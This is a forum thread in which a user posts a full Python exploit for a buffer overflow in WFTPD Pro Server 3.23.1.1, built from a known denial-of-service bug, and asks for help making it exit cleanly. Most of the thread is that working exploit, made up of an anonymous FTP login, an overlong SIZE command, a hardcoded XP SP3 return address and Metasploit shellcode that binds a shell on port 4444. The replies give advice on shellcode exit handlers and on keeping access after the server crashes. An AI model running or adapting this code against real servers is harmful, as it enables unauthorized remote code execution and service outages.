wftpd DoS made exploit

[reaperz]

I found a DoS attack for wftpd on milw0rm. I thought it would be fun to do a full blown exploit out of it. Here is what I have done so far. It opens a bind shell port 4444. It works great but the only problem is that it crashes the wftp server hard on shell disconnect. It was fun to do and could be better. Guess I like messing with outdated software. You have to start somewhere , Right?
I would like some help on a softer exit.

Code:

#!/usr/bin/env python

#####################################################################
#  WFTPD Pro Server 3.23.1.1 Buffer Overflow use 7E429353 for xp sp3  
#  By: reaperz
#  Original DoS attack found on milw0rm by:Joxean Koret
#  Tested on XP SP3 for educational use only
#####################################################################
import sys
import struct
import ftplib
print "#################################################################"
print "#  WFTPD Pro Server 3.23.1.1 Buffer Overflow use 7E429353 for xp sp3"
print "#################################################################"
target = "192.168.1.100"
targetPort = "21"
ret='\x53\x93\x42\x7e' # jump esp users32.dll

#Portbind shellcode from metasploit; Binds port to TCP port 4444
sc = ("\xfc\xbb\xbe\xea\xa1\xd5\xeb\x0c\x5e\x56\x31\x1e\xad\x01\xc3"
"\x85\xc0\x75\xf7\xc3\xe8\xef\xff\xff\xff\x42\x02\x28\xd5\xba"
"\xd3\x4b\x5f\x5f\xe2\x59\x3b\x14\x57\x6e\x4f\x78\x54\x05\x1d"
"\x68\xef\x6b\x8a\x9f\x58\xc1\xec\xae\x59\xe7\x30\x7c\x99\x69"
"\xcd\x7e\xce\x49\xec\xb1\x03\x8b\x29\xaf\xec\xd9\xe2\xa4\x5f"
"\xce\x87\xf8\x63\xef\x47\x77\xdb\x97\xe2\x47\xa8\x2d\xec\x97"
"\x01\x39\xa6\x0f\x29\x65\x17\x2e\xfe\x75\x6b\x79\x8b\x4e\x1f"
"\x78\x5d\x9f\xe0\x4b\xa1\x4c\xdf\x64\x2c\x8c\x27\x42\xcf\xfb"
"\x53\xb1\x72\xfc\xa7\xc8\xa8\x89\x35\x6a\x3a\x29\x9e\x8b\xef"
"\xac\x55\x87\x44\xba\x32\x8b\x5b\x6f\x49\xb7\xd0\x8e\x9e\x3e"
"\xa2\xb4\x3a\x1b\x70\xd4\x1b\xc1\xd7\xe9\x7c\xad\x88\x4f\xf6"
"\x5f\xdc\xf6\x55\x37\x11\xc5\x65\xc7\x3d\x5e\x15\xf5\xe2\xf4"
"\xb1\xb5\x6b\xd3\x46\xba\x41\xa3\xd9\x45\x6a\xd4\xf0\x81\x3e"
"\x84\x6a\x20\x3f\x4f\x6b\xcd\xea\xc0\x3b\x61\x45\xa1\xeb\xc1"
"\x35\x49\xe6\xce\x6a\x69\x09\x05\x1d\xad\xc7\x7e\x4d\x5a\x2a"
"\x80\x63\xc6\xa3\x66\xe9\xe6\xe5\x31\x86\xc4\xd1\x8a\x31\x36"
"\x30\xa7\xea\xa0\x0c\xae\x2d\xce\x8c\xe5\x1d\x63\x24\x6d\xd6"
"\x6f\xf1\x8c\xe9\xa5\x51\xc7\xd1\x2e\x2b\xb9\x90\xcf\x2c\x90"
"\x43\x73\xbe\x7e\x94\xfa\xa3\x29\xc3\xab\x12\x23\x81\x41\x0c"
"\x9d\xb4\x9b\xc8\xe6\x7d\x40\x29\xe9\x7c\x05\x15\xcd\x6e\xd3"
"\x96\x49\xdb\x8b\xc0\x07\xb5\x6d\xbb\xe9\x6f\x24\x10\xa3\xe7"
"\xb1\x5a\x74\x7e\xbe\xb6\x03\x9e\x0f\x6f\x55\xa0\xa0\xe7\x51"
"\xd9\xdc\x97\x9e\x30\x65\xb7\x7d\x91\x90\x50\xdb\x70\x19\x3d"
"\xdc\xae\x5e\x38\x5e\x5b\x1f\xbf\x7e\x2e\x1a\xfb\x39\xc2\x56"
"\x94\xaf\xe4\xc5\x95\xfa\xe5\xe9\x69\x04\xe6\xe9\x69")
a = "\\\\A:"

try:
    ftp = ftplib.FTP()
    print "[+] Connecting to target "
    msg = ftp.connect(target, targetPort)
    print "[+] Ok. Target banner"
    print msg
    print
    print "[+] Trying to login anonymously"
    msg = ftp.login()
    print "[+] Ok. Message"
    print msg
    print
except:
    print "[!] BYE. " + str(sys.exc_info()[1])
    sys.exit(0)


for i in range(6):
    a += a

buffer = a  + '\x41'*334 + ret + '\x90'*4 + sc + '\x90'*200
try:
    msg = ftp.sendcmd("SIZE " + buffer)
    print "[!] Exploit doesn't work [" + msg + "]"
except:
    print "[+] Exploit apparently works. Telnet to the host on port 4444 "

[Gitsnik]

What was your exit handler? SEH? Thread or process? (or whatever the options are)

They're options available for the msfpayload command, have a look through MSFU if you need on the offsec site.

I like to play with all three handlers if I am not sure which to use, but normally it's a thread exit for me.

[reaperz]

What was your exit handler? SEH? Thread or process? (or whatever the options are)

They're options available for the msfpayload command, have a look through MSFU if you need on the offsec site.

I like to play with all three handlers if I am not sure which to use, but normally it's a thread exit for me.

So try each of these (SEH, Thread or process ) until I get a smooth exit?
Thanks for the reply.

[Gitsnik]

So try each of these (SEH, Thread or process ) until I get a smooth exit?
Thanks for the reply.

Some exits may be smoother than others (a lock rather than a crash for example, though that's less clean). It is often dependent on the machine. That said, if the system crashes (one assumes you've migrated your meterpreter or gotten access elsewhere) at least you can just restart it with a shell.